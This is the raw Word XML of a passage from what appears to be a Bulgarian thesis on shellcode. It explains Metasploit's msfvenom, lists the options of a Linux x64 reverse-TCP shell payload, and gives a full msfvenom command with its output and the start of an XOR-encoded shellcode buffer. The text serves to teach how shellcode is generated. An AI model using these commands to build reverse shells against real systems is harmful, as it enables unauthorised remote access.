      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> решения</w:t>
      </w:r>
      <w:bookmarkEnd w:id="90"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>В практиката нуждата от шелкод често е ограничена до малък брой основни типове задачи, например пускане на локален шел и пускане на шел през мрежа, и е логично, че когато процесът за изработването му всеки път е много трудоемък, то той ще бъде автоматизиран от начало до край. В тази глава накратко се разглеждат някои от успешните опити.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="91" w:name="_dah7cnuh3rcv" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="92" w:name="_Toc3540783"/>
      <w:bookmarkEnd w:id="91"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>MSFvenom</w:t>
      </w:r>
      <w:bookmarkEnd w:id="92"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Metasploit е комплект от много инструменти, предназначени за тестване на сигурност. Те включват инструменти за генериране на шелкод (msfvenom), тестване за технологични пропуски (msfbinscan), разузнаване с база данни от пропуски и уязвимости и много други обединени в единна конзола (msfconsole). Те са тясно интегрирани и предоставят пълна и съвместима среда. Разработва се на ruby и има активна общност</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="29"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> с ежедневно подобряване.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>MSFVenom е частта от проекта Metasploit, която генерира шелкод автоматично. Той поддържа голям набор от шелкод реализации. Поддържат се над 500 товара и над 40 метода за кодиране за различни архитектури и платформи. Изходът може да бъде форматиран за различни езици или изпълними формати. Тези и още много способности го правят един от най-мощните и използвани инструменти от вида си.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Той е командно приложение, което приема входа си като GNU стил аргументи</w:t>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="000B2140" w:rsidRPr="00112660">
        <w:endnoteReference w:id="30"/>
      </w:r>
      <w:r w:rsidR="000B2140">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. Всеки модул приема свои параметри като ключ и стойност двойки, които могат да се видят чрез добавяне на --list-options след като е избран товар. Например за reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>msfvenom -p linux/x64/shell/reverse_tcp --list-options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Options for payload/linux/x64/shell/reverse_tcp:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=========================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>Name: Linux Command Shell, Reverse TCP Stager</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>Module: payload/linux/x64/shell/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   Platform: Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>Arch: x64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Needs Admin: No</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Total size: 298</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>Rank: Normal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Provided by:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>ricky</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>tkmru</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Basic options:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Name   Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>----   ---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">LHOST               </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">yes   </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>The listen address (an interface may be specified)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">LPORT  4444         </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">yes   </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>The listen port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  Spawn a command shell (staged). Connect back to the attacker</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Advanced options for payload/linux/x64/shell/reverse_tcp:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>=========================</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Name                    </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>Current Setting  Required  Description</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">----                    </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>---------------  --------  -----------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">AppendExit              </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">false        </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">no    </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>Append a stub that executes the exit(0) system call</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">AutoRunScript                            </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">no    </w:t>
      </w:r>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
        <w:t>A script to run automatically on session creation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="005E60F7" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E60F7">
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>[останалите са порпуснати]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00303E70">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">: Параметри на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">reverse shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t xml:space="preserve">от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00567E8F">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Така удобно могат да се видят детайли за всеки модул и да се изберат подходящи параметри. Така може да се изготви команда за генериране:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>msfvenom --platform linux -a x64 -p linux/x64/shell/reverse_tcp -e x64/xor -b \x00 -f c lport=10001</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Found 1 compatible encoders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Attempting to encode payload with 1 iterations of x64/xor</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>x64/xor succeeded with size 175 (iteration=0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>x64/xor chosen with final size 175</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Payload size: 175 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Final size of c file: 760 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>unsigned char buf[] =</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>"\x48\x31\xc9\x48\x81\xe9\xef\xff\xff\xff\x48\x8d\x05\xef\xff"</w:t>
      </w:r>
    </w:p>
